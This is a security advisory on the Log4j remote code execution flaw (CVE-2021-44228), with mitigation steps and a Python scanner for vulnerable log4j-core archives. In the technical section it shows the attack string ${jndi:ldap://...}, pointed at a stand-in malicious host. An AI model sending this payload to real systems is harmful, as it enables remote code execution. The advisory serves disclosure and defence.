Advisory December 13, 2021

Log4j RCE 0-day (CVE-2021-44228) vulnerability advisory

Obrela SOC

On December 9, 2021, a zero-day vulnerability in the popular Apache Log4j utility (CVE-2021-44228) was publicly disclosed that results in remote code execution (RCE). Log4j 2 is an open source Java logging library developed by the Apache Foundation and widely adopted in many applications and services. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Technical details

A maliciously crafted string can trigger an application to reach out to an external location when it is logged by a vulnerable instance of log4j. Threat actors may place such text in an HTTP User-Agent header or in a simple POST form field, typically of the form: ${jndi:ldap://<malicious_entity_host>.com/resource}

The log4j vulnerability resides in the parsing of this string: the lookup makes the application contact the malicious host via the Java Naming and Directory Interface (JNDI), and the Java code served by the malicious service is then executed on the victim, resulting in remote code execution.

Mitigation

From log4j 2.15.0, this behavior is disabled by default. In previous releases (>2.10) it can be mitigated by setting the system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath. Java 8u121 protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.

However, the patch for CVE-2021-44228 was found to be incomplete and could be abused with crafted input data to cause a Denial of Service (DoS), tracked as CVE-2021-45046. Users on Java 8 or later are therefore advised to upgrade to the latest version of Log4j, 2.16.0; users on Java 7 should upgrade to 2.12.2 when it becomes available.
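As an added example (not Obrela's tooling), the following Python scanner applies the version and JndiLookup thresholds above to JAR/WAR files found on a host, descending into nested archives such as fat jars and WEB-INF/lib. The pom.properties and JndiLookup.class paths are the standard ones inside log4j-core; the sample archives the script builds are constructed stand-ins, not real Log4j builds.

```python
import io, re, zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")  # fat jars and WEB-INF/lib bundles

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing patch digit is 0, suffixes like '-rc1' are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None

def assess(version, has_jndi_lookup):
    """Apply the advisory's thresholds to one log4j-core instance."""
    if not has_jndi_lookup:
        return "mitigated (JndiLookup.class removed)"
    if version is None:
        return "unknown version with JndiLookup present: treat as vulnerable"
    if version >= (2, 16, 0) or (2, 12, 2) <= version < (2, 13, 0):
        return "fixed"
    if version == (2, 15, 0):
        return "DoS only (CVE-2021-45046): upgrade to 2.16.0"
    return "vulnerable to RCE (CVE-2021-44228)"

def scan_jar(data, path="<bytes>", depth=0):
    """Return [(location, verdict)] for each log4j-core found, descending into nested archives."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []  # entry with an archive extension that is not actually a zip
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        findings, names, version = [], set(zf.namelist()), None
        if POM_PROPS in names:
            props = dict(l.split("=", 1) for l in zf.read(POM_PROPS).decode().splitlines() if "=" in l)
            version = parse_version(props.get("version", ""))
        if version is not None or JNDI_LOOKUP in names:
            findings.append((path, assess(version, JNDI_LOOKUP in names)))
        for n in sorted(names):
            if n.endswith(NESTED) and depth < 8:
                findings.extend(scan_jar(zf.read(n), f"{path}!/{n}", depth + 1))
    return findings

def build_sample_archive(version=None, with_jndi_lookup=False, nested=None):
    """Constructed stand-in for a log4j-core jar or an application WAR (no real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
        for name, blob in (nested or {}).items():  # e.g. WEB-INF/lib/log4j-core-2.14.1.jar
            zf.writestr(name, blob)
    return buf.getvalue()
```

The system-property mitigation (log4j2.formatMsgNoLookups) is not visible inside the archive, so it must be verified separately on the running JVM's command line or system properties.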

Recommendation

It is highly recommended to update Log4j to the latest official version to patch this vulnerability. The Obrela Security Industries teams remain vigilant and continue to monitor the activity.

Note: This article was updated on 16 December 2021 to add new mitigation details.